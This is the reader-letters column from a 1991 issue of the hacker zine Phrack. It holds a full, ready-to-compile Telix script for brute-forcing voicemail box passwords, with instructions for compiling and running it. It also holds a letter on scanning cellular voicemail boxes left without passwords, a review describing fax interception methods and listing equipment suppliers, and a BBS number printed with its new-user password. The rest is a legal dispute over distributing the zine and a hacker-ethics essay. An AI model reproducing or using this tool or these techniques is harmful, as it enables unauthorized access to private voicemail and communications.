home *** CD-ROM | disk | FTP | other *** search
- ______________________________________________________________________________
-
-
- ==Phrack Inc.==
-
- Volume Three, Issue Thirty-five, File 2 of 13
-
- [-=:< Phrack Loopback >:=-]
-
- By Phrack Staff
-
- Phrack Loopback is a forum for you, the reader, to ask questions, air
- problems, and talk about what ever topic you would like to discuss. This is
- also the place The Phrack Staff will make suggestions to you by reviewing
- various items of note; magazines, software, catalogs, hardware, etc.
- ______________________________________________________________________________
-
- What's on Your Mind
- ~~~~~~~~~~~~~~~~~~
-
- :: Hacking VMB's ::
-
- From: Mr. Upsetter
- To: phracksub@stormking.com
- Subject: Phrack 34 VMB article
-
- The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
- It reminded me of some experiences I had with a cellular voice mail system a
- couple years ago in San Diego. I would bet there are similar systems in other
- cities.
-
- These VMB's would automatically answer calls when the subscriber wasn't on the
- air. They worked just like standard VMB's. To access the box, the owner could
- dial his or her own cellular number, then hit * when it answered. Then the VMB
- would ask for a password.
-
- Guess what the default password was? None! That meant all you had to do was
- dial up a cellular VMB and hit *, and you were in. How many VMB's still had
- the default password? About half...
-
- To scan for cellular VMB's all you had to do was dial numbers in the cellular
- prefix. It was pretty fun...almost too easy.
-
- Cheers,
- Mr. Upsetter
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- >From: Zoso Puda
- >
- >After reading PHRACK 34 I thought it was good. Especially the article on VMB
- >hacking. As a matter of fact I wrote a SALT script to help me do it.
-
- This is exactly what we like to see. People actually getting basic
- information and building on it.
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- +-------------------------------------+
- | ZoSoft Telix VMB Hacker |
- | |
- | written by: Zoso Puda |
- +-------------------------------------+
- First words
- -----------
- After reading Night Ranger's article (see PHRACK 34), I decided to make a
- VMB hacking program. Night Ranger provided good insight into how to hack VMB
- systems but some VMBs are hard to crack. What I came up with is a program to
- help me hack some of the harder systems. The ones that don't use the defaults
- are tough. Also my phone has the buttons and earpiece in one unit and I had to
- dial then put the phone to my ear and listen, look at the buttons to dial a
- number and put the phone back to my ear to listen. It soon became tiresome.
-
- What I finally came up with was a program to let me run all the phone
- functions from the keyboard. My modem speaker is loud enough to hear clearly so
- it seemed like the perfect thing to do. I also automated certain features like
- incrementing the password or box number. The program is not fully automated
- however. You must run this program manually. It's main purpose is to allow you
- to run normal phone functions via the keyboard. If you cannot hear clearly
- through your modem speaker then pick up the phone after the program dials the
- VMB phone # and hang up the phone before hanging up the modem.
-
- What follows is a brief description on how to use the program, compile the
- program, and run the program. A working knowledge of VMB systems is expected.
-
- Parameter details
- -----------------
- VMB phone number : If you don't know this, give it up.
-
- Setup sequence : This code is used for systems that require a '9' or '#' or
- '*' to be pressed before the box number. Up to 3 characters
- can be in this string.
-
- Valid Box # : This would be a known valid box or the box you will
- be attempting to hack. This value remains constant.
-
- Codefile filename: You may use a file to get 'default' or your favorite
- passwords from. You must include the extension.
-
- Starting box/code: Box # or code to start checking. This value will
- increase automatically upon pressing [F7].
-
- Using the function keys
- -----------------------
- [F1] Dials the VMB system (see params).
- [F2] Hangs-up the modem.
- [F3] Closes the current codefile.(see params).
- [F4] Lets you set the current code/box #.
- [F5] Dials the Setup sequence (see params).
- [F6] Dials the current code.
- [F7] Makes the next code current.
- [F8] Dials the valid box (see params).
- [F9] Allows you to re-set the parameters.
- [F10] Hangs-up and quits the program.
- [0 - 9] These keys will dial 0 - 9 respectively.
- [*, #] These keys will dial * and #.
- [/] Used as a substitute # for the keypad.
-
- Basic Insructions
- -----------------
- Codefiles should be stored in the same directory as your Telix program.
-
- A sample codefile should look like this:
-
- 1111
- 2222
- 3333
- etc...
-
- I suggest you make seperate codefiles for the number of digits in each code.
- For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
- something similar.
-
- During parameter entry, if you enter a codefile and it exists, you will NOT
- be prompted for a 'Starting box/code'. When the codefile is finished, the
- current code will set itself to 1000.
-
- If you enter a blank for the codefile or the name you entered doesn't exist
- then you will be prompted for a 'Starting Box/Code'.
-
- Compiling
- ---------
- Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
- VMBHACK.SLT into the directory where your Telix scripts are. Compile using
- CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
- Alt-G followed by the program name (VMBHACK).
-
- //---------------------------<CUT HERE>-------------------------------------
- // ZoSoft VMB Hacker Version 1.4
- // Code by: Zoso, November 1991
- //
- // See PHRACK 34 for more information on VMB systems.
- //
- // NOTE: Do not remove the credits of the original author, modified versions
- // you may add credits, but please do not remove any.
- //
- str code[10], // Global Variables
- codes[10],
- reset[1],
- vmb_number[15],
- borc[1],
- valid[10],
- setup[3];
- str filename[12],
- fstatus[10];
- int f;
- int fflag = 0;
- init_modem() // Modem initialization
- {
- cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
- cputs("^M"); // some modems, you may have to
- waitfor("OK",20); // alter this. See you modem
- manual.
- }
- vmb_dial(str string) // Dial function
- {
- str workstr[20];
- workstr = string;
- strcat(workstr,";");
- cputs("ATDT");
- cputs(workstr);
- cputs("^M");
- cputs("^M");
- }
- hang_up() // Hang Up function
- {
- hangup();
- waitfor("",20);
- cputs("ATH0");
- cputs("^M");
- cputs("^M");
- clear_scr();
- display();
- }
- next_code() // Next code function
- {
- int cd;
- if (fflag)
- {
- if (not feof(f)) // Check for file first
- {
- fgets(code,10,f);
- return;
- }
- if (feof(f))
- {
- file_close();
- code = "999";
- goto NEXTCODE;
- }
- }
- NEXTCODE:
- cd = stoi(code);
- cd = cd + 1; // This line determines how the
- code
- itos(cd,code); // gets incremented.
- }
- set_code() // Enter new code
- {
- gotoxy(65,2);
- gets(code,10);
- }
- parameters() // Set parameters
- {
- str c[1];
- file_close();
- GETINFO:
- clear_scr();
- printsc("VMB Hacker Parameters^M^J");
- printsc("^M^JVMB phone number :");
- gets(vmb_number,15);
- printsc("^M^JSetup sequence :");
- gets(setup,3);
- printsc("^M^JValid box # :");
- gets(valid,10);
- printsc("^M^JCodefile filename :");
- gets(filename,12);
- if (filename != "")
- {
- open_file();
- next_code();
- }
- if (not fflag)
- {
- filename = "N/A";
- printsc("^M^JStarting box/code :");
- gets(code,10);
- }
- printsc("^M^J^M^JCorrect? (Y/n):");
- gets(c,1);
- if (c == "n" || c == "N")
- goto GETINFO;
- }
- press_enter() // Pause routine
- {
- str a[1];
- pstraxy("Press [ENTER] to continue...",20,23,11);
- gets(a,1);
- }
- title_scr() // Title screen
- {
- str i[1];
- TITLE:
- clear_scr();
- pstraxy(" - ZoSoft VMB Hacker V1.4 -",20,4,11);
- pstraxy("written for Telix by: Zoso Puda",20,6,14);
- press_enter();
- }
- display() // Display screen
- {
- box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
- pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
- pstraxy("VMB Number:",4,2,31); // Information display
- pstraxy(vmb_number,16,2,27);
- pstraxy("Valid #:",33,2,31);
- pstraxy(valid,42,2,27);
- pstraxy("Current:",57,2,31);
- pstraxy(code,66,2,27);
- pstraxy("Codefile:",6,4,31);
- pstraxy(filename,16,4,27);
- pstraxy("File status:",29,4,31);
- pstraxy(fstatus,42,4,27);
- pstraxy("Setup sequence:",50,4,31);
- pstraxy(setup,66,4,27);
- box(0,6,78,10,4,0,103); // Function key display
- pstraxy("[ ]",30,6,111);
- pstraxy(" 0 - 9,*,#",31,6,110);
- pstraxy("[ ] Dial VMB", 2,7,111);
- pstraxy("F1", 3,7,110);
- pstraxy("[ ] Hang up",22,7,111);
- pstraxy("F2",23,7,110);
- pstraxy("[ ] Close file",42,7,111);
- pstraxy("F3",43,7,110);
- pstraxy("[ ] Set Current",61,7,111);
- pstraxy("F4",62,7,110);
- pstraxy("[ ] Setup seq.",2,8,111);
- pstraxy("F5", 3,8,110);
- pstraxy("[ ] Dial current",22,8,111);
- pstraxy("F6",23,8,110);
- pstraxy("[ ] Next box/code",42,8,111);
- pstraxy("F7",43,8,110);
- pstraxy("[ ] Valid box",61,8,111);
- pstraxy("F8",62,8,110);
- pstraxy("[ ] Parameters",22,9,111);
- pstraxy("F9",23,9,110);
- pstraxy("[ ] QUIT",41,9,111);
- pstraxy("F10",42,9,110);
- gotoxy(0,11);
- }
- quit_vmb() // End program
- {
- file_close();
- hangup();
- waitfor("",20);
- clear_scr();
- printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
- cputs_tr(_mdm_init_str); // Restore modem params
- }
- open_file() // Open Codefile
- {
- fflag = 1;
- f = fopen(filename,"r");
- fstatus = "OPEN";
- if (ferror(f))
- file_close();
- }
- file_close() // Close Codefile
- {
- fflag = 0;
- fclose(f);
- fstatus = "CLOSED";
- }
- main() // MAIN program module
- {
- int chr;
- title_scr();
- parameters();
- clear_scr();
- display();
- init_modem();
- TOP:
- gotoxy(0,11);
- chr = inkeyw();
- if (chr == '0') vmb_dial("0"); // Dial 0-9
- if (chr == '1') vmb_dial("1");
- if (chr == '2') vmb_dial("2");
- if (chr == '3') vmb_dial("3");
- if (chr == '4') vmb_dial("4");
- if (chr == '5') vmb_dial("5");
- if (chr == '6') vmb_dial("6");
- if (chr == '7') vmb_dial("7");
- if (chr == '8') vmb_dial("8");
- if (chr == '9') vmb_dial("9");
- if (chr == '#') vmb_dial("#"); // Pound sign (#)
- if (chr == '/') vmb_dial("#"); // Make (/) same as (#) for keypad
- if (chr == '*') vmb_dial("*"); // Asterisk (*)
- if (chr == 15104) // F1
- vmb_dial(vmb_number);
- if (chr == 15360) // F2
- hang_up();
- if (chr == 15616) // F3
- {
- file_close();
- display();
- }
- if (chr == 15872) // F4
- {
- set_code();
- display();
- }
- if (chr == 16128) // F5
- vmb_dial(setup);
- if (chr == 16384) // F6
- vmb_dial(code);
- if (chr == 16640) // F7
- {
- next_code();
- display();
- }
- if (chr == 16896) // F8
- vmb_dial(valid);
- if (chr == 17152) // F9
- {
- hang_up();
- parameters();
- display();
- }
- if (chr == 17408) // F10
- {
- quit_vmb();
- goto END;
- }
- goto TOP;
- END:
- prints("^M^J");
- }
- //---------------------------<CUT HERE>---------------------
-
- ______________________________________________________________________________
-
- :: More Legal Stuff ::
-
- >From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
- >Subject: RE: Who/What is this?
- >
- >In this country, the receipt of documents like this would probably be
- >pretty helpful in sending a person down on a conspiracy to contravene
- >a section or more of the Computer Misuse Act, I do not appreciate crap
- >like this appearing on my machine but since you didn't send it me, I
- >can't really moan at you - What I would appreciate though is if you
- >told people that forwarding it to people who don't want it is probably
- >not a good idea, unless you want all your list members locked up in
- >some pokey British gaol that is!
- >
- >Michael Lawrie.
- >---
- >Michael Lawrie, Hicom Group Security <security@uk.ac.lut.hicom>
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- Sir,
- You will have to excuse my ignorance of telecom laws in other countries.
- In the United States, distribution of technical information such as Phrack Inc.
- is protected by law.
-
- Hackers are not involved in conspiracies or plots. Most hackers could
- care less about politics. Hackers are interested in the progression of
- technology and learning about how our advanced society works. The inefficient
- structure known as government is the last thing most hackers are interested in
- exploring.
-
- Phrack Inc. has no "membership." Phrack Inc. is an electronically
- distributed publication. It is like any other security oriented newsletter.
- Have you ever heard of "Computer Security Journal", "Computers and Security",
- or "Computer Crime Digest?" These are some of the "security industry"
- publications that are read in the U.S. Phrack Inc. merely has a little
- different flavor to it. If you are interested in seeing any of these printed
- journals, I can forward their address to you.
-
- I am sorry if you received Phrack Inc. and didn't wish to read it. You
- might wish to take the matter up with the person that forwarded it to you. I
- hope it wasn't too big of an inconvenience for you to delete the mail message
- containing Phrack Inc.
-
- Cheers,
-
- Dispater
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- After a (as it turns out not so private) conversation with Torq, it seems
- this guy isn't even an admin anywhere. He just likes to pretend he is. Did my
- reply end this little debate? NOT! This person had the nerve to intercept my
- private mail to Torq and then proceeded to bitch about it some more.
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- >From MICHAEL@hicom.loughborough.ac.uk Sat Nov 9 09:45:53 1991
- Date: Fri, 8 Nov 91 13:19 GMT
- From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
- To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>>
- Subject: The EFF.
-
- I found the following message the other day, whilst routing around, I am to
- assume you lied to me about taking him off the list but for now we'll forget
- that.
-
- > From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991
- > Date: Wed, 23 Oct 91 01:41:47 -0400
- > From: phracksub@stormking.com
- > Message-Id: <::::::::::::::::::::::>
- > To: torq@:::::::::::::::
- > Subject: Phrack
- >
- > This guy sounds like a total idiot. If he does kill your account or something
- > stupid, get a hold of the EFF. They went to bat for someone who had their
- > account revoked because he/she had issues of Phrack on their directory.
- >
- > people should get a clue....
- >
- > Dispater
- > phracksub@stormking.com
-
- As you say, people should get a clue. Are you assuming that 'torq' is perhaps
- American and as such has his rights protected by constitution? He isn't, he is
- British and doesn't really as such have much going for him. If I want to kill
- his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
- is not breaking any laws because it does not show intent, it would be breaking
- my machine's regulations if it came here. I would enjoy the EFF to come 'to
- bat' for Torq if I revoke his account for having issues of Phrack in his
- directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
- that you know of?
-
- Regards...
- Michael.
-
- ---
- Michael Lawrie, Operations Group, Systems Development and Security.
- Mail: michael@uk.ac.lut.hicom (Span:19527::60478::lorry)
- [What pretentious signature?] (Inet: lorry@mit.edu)
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- From: Dispater
- To: MICHAEL@hicom.loughborough.ac.uk
-
- I never said I would delete him from the distribution list. I don't
- have to DO anything. Who the hell are you pretending to be anyway? You aren't
- the admin of MIT's gnu machine.
-
- >I found the following message the other day, whilst routing around, I am to
- >assume you lied to me about taking him off the list but for now we'll forget
- >that.
-
- Really? What the hell were you doing prowling though someone else's
- mail? I assume you did it without Torq's permission. I wonder if MIT would
- like to hear that some British hacker is rummaging around their machine? Your
- "finding" of our private e-mail might place you in criminal violation of the
- Electronic Communications Privacy Act of 1986. This is a federal law in the
- United States which protects the privacy of electronic communications. Your
- interception of our communications has violated our privacy. How would you
- like me to have a little chat with YOUR supervisor?
-
- Why you care about what takes place on the MIT computer which is located
- here in the USA? In this country freedom of speech is a right granted to all
- its citizens. The previous publisher of Phrack had to go to Federal Court to
- prove it and he succeeded. Phrack Inc. is 100% legal here and there is not one
- damn thing you can do about it!
-
- Dispater
- ______________________________________________________________________________
-
- :: Hacker Philosophy ::
-
- From: The Dark Lord Sarik Malthus
- Organization: Underground Computing Foundation
-
-
- > I'm curious...now, don't think I am trying to judge you, or your
- > actions, or anything...but I am wondering how you, in your mind, justify the
- > actions of hackers and the kind of information provided by your magazine?
-
- I don't. I think people spend too much time attempting to justify
- their "morality." I don't play that guilt trip. I only seek information.
- Information has no morality. It is simple and pure, just like truth.
-
- I do feel that with knowledge comes responsibility not to use it in a
- destructive way. This is why I will not print "how to make bomb" files in
- Phrack Inc. Explosives are made for one thing and it doesn't involve too
- much creativity. People can get that type of stuff elsewhere.
-
- I have never damaged any system or hurt any individual financially.
- Carding is unquestionable robbery. If you know the person you are carding
- from, that is revenge and is a different category, as far as I am concerned,
- but it still doesn't make it right. Besides, any poser with half a brain can
- pull a CBI. That doesn't demonstrate much talent to me. I admit I went
- through the c0deZ phase, but I moved onto better things.
-
- I guess your basic question may boil down to, "Why hack?" I see the
- internet and the telecom world in as the latest frontier to be explored. If
- you look back at how this country started, you will see that it was explored
- by people who probably had a similar mentality to that of hackers. We want
- to test ourselves. We want to have a broad range of different experiences in
- our lives. We are not content with ignorance of the unknown. And, to some
- extent we are sick of our current society's norms. With that in mind we
- leave the security of what is considered acceptable at times.
-
- I guess I have a lot of different unpopular views....oh well.
- _______________________________________________________________________________
-
- A Review of:
- ~~~~~~~~~~
- Full Disclosure #23 - a publication For Truth, Justice, and The American Way
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Full Disclosure Subscription Rates:
- P.O. Box 903-FD23 U.S - 12 issues for $18.00
- Libertyville IL 60048 24 issues for $29.95
- No Canadian orders, please!
- by:Twisted Pair
-
-
- About a month ago I mailed in a coupon I got from friend in order to get a
- sample issue of Full Disclosure. Within a week I received Issue #23. It's got
- articles on fax interception, dumpster diving, computer security tips,
- surveillance tips, technical stuff, mail surveillance, etc.
-
- The Fax Interception article was most interesting to me. I've often
- wondered just how easy it could be to intercept faxes. Its all explained in
- the article. Here's some text from the article:
-
- | False Sense of Security:
- |
- | With the widespread proliferation of fax machines came increased use.
- | In general, a document transferred has been given the same sort of
- | validity as one sent or received by the U.S. Mail.* In general, such
- | communications were originally secure. Now that interception equipment is
- | available, the
- | sense of security has become false.
-
- *Note: Just this month, the FCC has stopped accepting paperwork with faxed
- signatures on them. Their new policy states that they only accept
- original signatures.
-
- How could the average Phrack reader start intercepting faxes? Use a
- standard fax machine hooked up to someone's line? Naaah. Wouldn't work. The
- handshaking routine between the two corresponding fax machines would be screwed
- all to hell if you threw a third machine into the mix. Full Disclosure claims
- to have successfully nabbed faxes with another method. They've pointed out
- this assertion with a photo on their front page of a "fax". It was supposedly
- intercepted from the FBI. It shows a computer screen with an FBI "FAX" on it.
- It looks more like the photo was made with some cutting and pasting at the
- neighborhood PIP store. Maybe they should have added the caption "Simulated
- Picture" to their front page.
-
- They recommend using IBM PC fax boards to intercept faxes. You'd need
- "sophisticated" software that would ignore the handshaking sequences between
- the two fax machines you're spying on. The IBM would just save all the page
- information and ignore the protocol information transmitted.
-
- Back to the article....
-
- | Cellular phone-based fax machines provide ripe opportunity for "hacker"
- | intercepts, since the signal is available via low cost police scanners.*
- | No physical connection to a common carrier network is necessary. There is
- | absolutely no risk of being detected.
-
- *Note: That should read MODIFIED police scanners. See any of the ads in
- "Nuts & Volts" for a book on doing this.
-
- Discussed in the article is something called Broadband Interception.
- Commercial fax interception equipment can be hooked up to monitor satellite
- link traffic. One unit can decode up to 150 simultaneous fax transmissions
- from a 6,000 phone line satellite link.
-
- Next, all the consequences of forged faxes are discussed. People have
- become so reliant on fax technology that they incorrectly assume that anything
- that "comes over the fax" must be legitimate. Forgers find faxing much simpler
- than trying to make a "real" document. The trouble of altering postmarks and
- signatures is bypassed. All they need now is scissors and tape to make any
- "legitimate-looking" document needed. In their next issue, they further
- discuss fax interception and all the implications of sending sensitive info by
- fax.
-
- | Fax Intercept Suppliers
- | (The sale and/or use of fax interception equipment may be
- | restricted by State and Federal law)
- |
- | Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
- | Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
- | El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
- | [Many others listed]
-
- Oh, here's an ad from Full Disclosure. It's a business card run:
- ______________________________________________________
- | | |
- | | Unix Systems Specialists Available July 10, 1992 |
- | | |
- | | L E N R O S E |
- | | |
- | | Convicted "Hacker" |
- | | and |
- | | Computer Consultant |
- | | 799 Royal St. Geore #105 |
- | | Naperville, IL 60563 (708) 527-1293 |
- | |______________________________________________________|
-
- Since you might want to check out a copy of Full Disclosure for yourself,
- I'll include their address and stuff. The issue I had was 16 pages long,
- half-newspaper size.
- ______________________________________________________________________________
-
-
- A Review of TAP #105
- ~~~~~~~~~~~~~~~~~~~
- TAP Magazine Subscription Rates:
- PO Box 20264 10 issues for $10.00
- Louisville KY 40250-0264
-
- by Dispater
-
- Around March of 1991 I mailed in my $10. for a subscription to TAP
- Magazine. Promoted as "the oldest hacker magazine" and "created by Abbie
- Hoffman." I still, to this day, have not received ONE issue for my money.
-
- While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
- back issues consisting of #97, #100 through issue #104. I was later given a
- complimentary issue of #105. After asking about #98 & #99, Predat0r said that
- he wasn't going to give those out because of some bullshit with Aristotle.
- Whatever...I still don't see why we couldn't see it.
-
- Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
- but it wasn't bad either. The issue was 18 pages long. For those of you who
- have never seen it, TAP contains information on hacking and phreaking as well
- as some political commentary. The articles are always diverse and interesting.
-
- TAP #105 contained information about the DNA Box. This is basically
- cellular phone phreaking. It was very good and quite detailed. There were
- also schematics of bugs and a flow chart explaining the incident initiation
- sequence of the E-911 system. This issue of TAP was sprinkled with some neat
- advertisements and news clippings (as usual) and wrapped up with a file about
- Blue Boxing. The price of $10.00 for 10 issues is worth it, but read on...
-
- Last week I asked Predat0r what was going on with TAP magazine. He told
- me that he had the material for the next three issues, but his copier or some
- other equipment was broken. This is an excuse I have heard before. Whether it
- is a valid excuse or not, only he knows. Since issue #105 (June) there has
- been not one issue of TAP. If you have ordered a subscription prior to July
- and not received anything, I highly suggest you write to Predat0r.
-
- The material contained in TAP is good and very much worth the price.
- (Especially compared to 2600 Magazine) However, I find that the general
- management of TAP to be poor, at this time, and therefore I highly recommend
- that you NOT send your $10 to TAP Magazine. Considering the amount of
- advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
- 2600, etc.) in the past year, there is no excuse for the non-existent service
- that has transpired. Predat0r is a good sysop and needs to manage TAP as he
- does his BBS. I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
- COLUMBIAN COKE.
-
- I really don't like to be so critical, but I know some people I've talked
- to are feeling ripped off. This is why I wrote this. I truly hope that TAP
- can get out of this slump.
- _______________________________________________________________________________
-